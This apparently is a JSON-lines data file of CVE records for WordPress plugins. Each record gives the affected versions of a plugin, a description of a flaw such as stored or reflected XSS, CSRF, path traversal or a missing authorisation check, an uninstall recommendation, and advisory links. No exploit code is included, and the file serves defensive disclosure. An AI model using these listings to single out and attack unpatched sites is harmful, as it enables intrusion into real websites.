{"CVE_ID":"CVE-2023-5127","slug":"wp-font-awesome","versionImpact":"1.7.9","description":"The WP Font Awesome plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcodes in versions up to, and including, 1.7.9 due to insufficient input sanitization and output escaping on 'icon' user supplied attribute. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-font-awesome\\\/trunk\\\/wp-font-awesome.php?rev=2875119#L101\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-font-awesome\\\/trunk\\\/wp-font-awesome.php?rev=2875119#L101\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-font-awesome\\\/trunk\\\/wp-font-awesome.php?rev=2875119#L68\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-font-awesome\\\/trunk\\\/wp-font-awesome.php?rev=2875119#L68\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-font-awesome\\\/trunk\\\/wp-font-awesome.php?rev=2875119#L70\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-font-awesome\\\/trunk\\\/wp-font-awesome.php?rev=2875119#L70\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-font-awesome\\\/trunk\\\/wp-font-awesome.php?rev=2875119#L85\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-font-awesome\\\/trunk\\\/wp-font-awesome.php?rev=2875119#L85\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-font-awesome\\\/trunk\\\/wp-font-awesome.php?rev=2875119#L83\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-font-awesome\\\/trunk\\\/wp-font-awesome.php?rev=2875119#L83\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-font-awesome\\\/trunk\\\/wp-font-awesome.php?rev=2875119#L55\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-font-awesome\\\/trunk\\\/wp-font-awesome.php?rev=2875119#L55\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-font-awesome\\\/trunk\\\/wp-font-awesome.php?rev=2875119#L99\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-font-awesome\\\/trunk\\\/wp-font-awesome.php?rev=2875119#L99\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59ee0b56-c11f-4951-aac0-8344200e4484?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59ee0b56-c11f-4951-aac0-8344200e4484?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-font-awesome\\\/trunk\\\/wp-font-awesome.php?rev=2875119#L53\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-font-awesome\\\/trunk\\\/wp-font-awesome.php?rev=2875119#L53\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3947","slug":"wp-todo","versionImpact":"1.3.0","description":"The WP To Do plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.0. This is due to missing or incorrect nonce validation on the wptodo_settings() function. This makes it possible for unauthenticated attackers to modify the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c132cfc1-03b3-4616-9a66-871e88c857cb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c132cfc1-03b3-4616-9a66-871e88c857cb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-todo\\\/trunk\\\/inc\\\/Base\\\/Model.php#L304\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-todo\\\/trunk\\\/inc\\\/Base\\\/Model.php#L304\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3971","slug":"similarity","versionImpact":"3.0","description":"The Similarity WordPress plugin through 3.0 does not have CSRF check in place when resetting its settings, which could allow attackers to make a logged in admin reset them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5dec5719-105d-4989-a97f-bda04d223322\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5dec5719-105d-4989-a97f-bda04d223322\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4868","slug":"extensions-for-elementor","versionImpact":"2.0.31","description":"The Extensions for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's EE Events and EE Flipbox widgets in all versions up to, and including, 2.0.31 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4322d9d6-13b6-4476-9eb5-fea4aff2e5ce?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4322d9d6-13b6-4476-9eb5-fea4aff2e5ce?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/extensions-for-elementor\\\/trunk\\\/modules\\\/events\\\/widgets\\\/ee-events.php#L2632\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/extensions-for-elementor\\\/trunk\\\/modules\\\/events\\\/widgets\\\/ee-events.php#L2632\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/extensions-for-elementor\\\/trunk\\\/modules\\\/flipbox\\\/widgets\\\/ee-flipbox.php#L1515\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/extensions-for-elementor\\\/trunk\\\/modules\\\/flipbox\\\/widgets\\\/ee-flipbox.php#L1515\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-49258","slug":"limb-gallery","versionImpact":"1.5.7","description":"Path Traversal: '...\/...\/\/' vulnerability in Limb WordPress Gallery Plugin \u2013 Limb Image Gallery. This issue affects WordPress Gallery Plugin \u2013 Limb Image Gallery: from n\/a through 1.5.7.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/limb-gallery\\\/wordpress-limb-gallery-plugin-1-5-7-arbitrary-file-download-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/limb-gallery\\\/wordpress-limb-gallery-plugin-1-5-7-arbitrary-file-download-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12529","slug":"brodos-net-onlineshop","versionImpact":"2.0.2","description":"The brodos.net Onlineshop Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'BrodosCategory' shortcode in all versions up to, and including, 2.0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brodos-net-onlineshop\\\/tags\\\/2.0.1\\\/class.onlineshop-init.php#L113\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brodos-net-onlineshop\\\/tags\\\/2.0.1\\\/class.onlineshop-init.php#L113\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/19a672c6-e911-46bb-a55b-c5788eedca3e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/19a672c6-e911-46bb-a55b-c5788eedca3e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6810","slug":"quiz-organizer","versionImpact":"2.9.1","description":"The Quiz Organizer plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 2.9.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quiz-organizer\\\/trunk\\\/src\\\/includes\\\/admin\\\/admin-modify-quiz.php#L230\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quiz-organizer\\\/trunk\\\/src\\\/includes\\\/admin\\\/admin-modify-quiz.php#L230\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quiz-organizer\\\/trunk\\\/src\\\/includes\\\/admin\\\/admin-modify-quiz.php#L570\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quiz-organizer\\\/trunk\\\/src\\\/includes\\\/admin\\\/admin-modify-quiz.php#L570\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quiz-organizer\\\/trunk\\\/src\\\/includes\\\/sets\\\/class-qzorg-plug-shortcode.php#L508\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quiz-organizer\\\/trunk\\\/src\\\/includes\\\/sets\\\/class-qzorg-plug-shortcode.php#L508\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/quiz-organizer\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/quiz-organizer\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/651646b0-231f-401c-9f6d-d414609bd7ba?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/651646b0-231f-401c-9f6d-d414609bd7ba?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1486","slug":"wowpth","versionImpact":"2.0","description":"The WoWPth WordPress plugin through 2.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/182ecda8-3385-4f9f-a917-efdeb237247c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/182ecda8-3385-4f9f-a917-efdeb237247c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4222","slug":"database-toolset","versionImpact":"1.8.4","description":"The Database Toolset plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.8.4 via backup files stored in a publicly accessible location. This makes it possible for unauthenticated attackers to extract sensitive data from database backup files. An index file is present, so a brute force attack would need to be successful in order to compromise any data.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/database-toolset\\\/trunk\\\/admin\\\/class-database-toolset-admin.php#L247\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/database-toolset\\\/trunk\\\/admin\\\/class-database-toolset-admin.php#L247\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/database-toolset\\\/trunk\\\/admin\\\/class-database-toolset-backup.php#L76\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/database-toolset\\\/trunk\\\/admin\\\/class-database-toolset-backup.php#L76\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa452a9a-9e26-41a1-8dea-4bafaf735bee?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa452a9a-9e26-41a1-8dea-4bafaf735bee?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4586","slug":"irm-newsroom","versionImpact":"1.2.17","description":"The IRM Newsroom plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'irmcalendarview' shortcode in all versions up to, and including, 1.2.17 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/irm-newsroom\\\/trunk\\\/irm-newsroom.php#L467\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/irm-newsroom\\\/trunk\\\/irm-newsroom.php#L467\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c6210c35-31d7-4a8d-b34f-596977c7a33e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c6210c35-31d7-4a8d-b34f-596977c7a33e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0968","slug":"watu","versionImpact":"3.3.9","description":"The Watu Quiz plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018dn\u2019, 'email', 'points', and 'date' parameters in versions up to, and including, 3.3.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/watu\\\/trunk\\\/views\\\/takings.php#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/watu\\\/trunk\\\/views\\\/takings.php#L31\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6341bdcc-c99f-40c3-81c4-ad90ff19f802\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6341bdcc-c99f-40c3-81c4-ad90ff19f802\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36716","slug":"wp-security-audit-log","versionImpact":"4.0.1","description":"The WP Activity Log plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the setup_page function in versions up to, and including, 4.0.1. This makes it possible for unauthenticated attackers to run the setup wizard (if it has not been run previously) and access plugin configuration options.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/vulnerabilities-fixed-in-wordpress-wp-security-audit-log-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/vulnerabilities-fixed-in-wordpress-wp-security-audit-log-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2252006\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2252006\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d0a8be3-6630-4cf7-b6cb-cdc86b99acb3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d0a8be3-6630-4cf7-b6cb-cdc86b99acb3?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-39992","slug":"meeting-scheduler-by-vcita","description":"Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in vCita.Com Online Booking & Scheduling Calendar for WordPress by vcita plugin <=\u00a04.3.2 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/meeting-scheduler-by-vcita\\\/wordpress-online-booking-scheduling-calendar-for-wordpress-by-vcita-plugin-4-3-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/meeting-scheduler-by-vcita\\\/wordpress-online-booking-scheduling-calendar-for-wordpress-by-vcita-plugin-4-3-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3946","slug":"wp-todo","versionImpact":"1.3.0","description":"The WP To Do plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.3.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de648bea-35c5-4611-aa2f-79e37a0299bb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de648bea-35c5-4611-aa2f-79e37a0299bb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-todo\\\/trunk\\\/inc\\\/Base\\\/Model.php#L304\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-todo\\\/trunk\\\/inc\\\/Base\\\/Model.php#L304\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3966","slug":"pray-for-me","versionImpact":"1.0.4","description":"The Pray For Me WordPress plugin through 1.0.4 does not sanitise and escape some parameters, which could allow unauthenticated visitors to perform Cross-Site Scripting attacks that trigger when an admin visits the Prayer Requests in the WP Admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9f0a575f-862d-4f2e-8d25-82c6f58dd11a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9f0a575f-862d-4f2e-8d25-82c6f58dd11a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4102","slug":"elfsight-pricing-table","versionImpact":"2.0.1","description":"The Pricing Table plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the ajax() function in all versions up to, and including, 2.0.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform unauthorized actions like editing pricing tables.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa769d51-8718-42e9-9070-0b878442dbc7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa769d51-8718-42e9-9070-0b878442dbc7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elfsight-pricing-table\\\/trunk\\\/core\\\/includes\\\/widgets-api.php#L71\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elfsight-pricing-table\\\/trunk\\\/core\\\/includes\\\/widgets-api.php#L71\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7100","slug":"bold-page-builder","versionImpact":"5.0.2","description":"The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's bt_bb_button shortcode in all versions up to, and including, 5.0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4999bbf3-3dbd-4c9a-b648-744192c9586c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4999bbf3-3dbd-4c9a-b648-744192c9586c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bold-page-builder\\\/trunk\\\/content_elements\\\/bt_bb_button\\\/bt_bb_button.php#L155\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bold-page-builder\\\/trunk\\\/content_elements\\\/bt_bb_button\\\/bt_bb_button.php#L155\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bold-page-builder\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bold-page-builder\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3127440\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3127440\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6927","slug":"viral-signup","versionImpact":"2.1","description":"The Viral Signup WordPress plugin through 2.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/05024ff5-4c7a-4941-8dae-c1a8d2d4e202\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/05024ff5-4c7a-4941-8dae-c1a8d2d4e202\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8546","slug":"elementskit-lite","versionImpact":"3.2.7","description":"The ElementsKit Elementor addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Video widget in all versions up to, and including, 3.2.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d21aeeb6-2e7d-426e-82c5-ff65e33bc5cb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d21aeeb6-2e7d-426e-82c5-ff65e33bc5cb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/elementskit-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/elementskit-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/trunk\\\/widgets\\\/video\\\/parts\\\/video-button.php#L10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/trunk\\\/widgets\\\/video\\\/parts\\\/video-button.php#L10\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3155880\\\/elementskit-lite\\\/trunk\\\/widgets\\\/video\\\/video.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3155880\\\/elementskit-lite\\\/trunk\\\/widgets\\\/video\\\/video.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3155880\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3155880\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11197","slug":"lock-user-account","versionImpact":"1.0.5","description":"The Lock User Account plugin for WordPress is vulnerable to user lock bypass in all versions up to, and including, 1.0.5. This is due to permitting application password logins when user accounts are locked. This makes it possible for authenticated attackers, with existing application passwords, to interact with the vulnerable site via an API such as XML-RPC or REST despite their account being locked.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/lock-user-account\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/lock-user-account\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/63374c5c-0b0a-4091-9aee-2e6c1d17a1b2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/63374c5c-0b0a-4091-9aee-2e6c1d17a1b2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10320","slug":"cookielay","versionImpact":"1.2.0","description":"The Cookielay plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's cookielay shortcode in all versions up to, and including, 1.2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cookielay\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cookielay\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e014aa5-4fdf-458b-a975-e3ced7186dc2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e014aa5-4fdf-458b-a975-e3ced7186dc2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12512","slug":"ask-me-anything-anonymously","versionImpact":"1.6","description":"The Ask Me Anything (Anonymously) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'askmeanythingpeople' shortcode in all versions up to, and including, 1.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ask-me-anything-anonymously\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ask-me-anything-anonymously\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f204d39-8a4a-4008-adc6-3ba72531f5a2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f204d39-8a4a-4008-adc6-3ba72531f5a2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
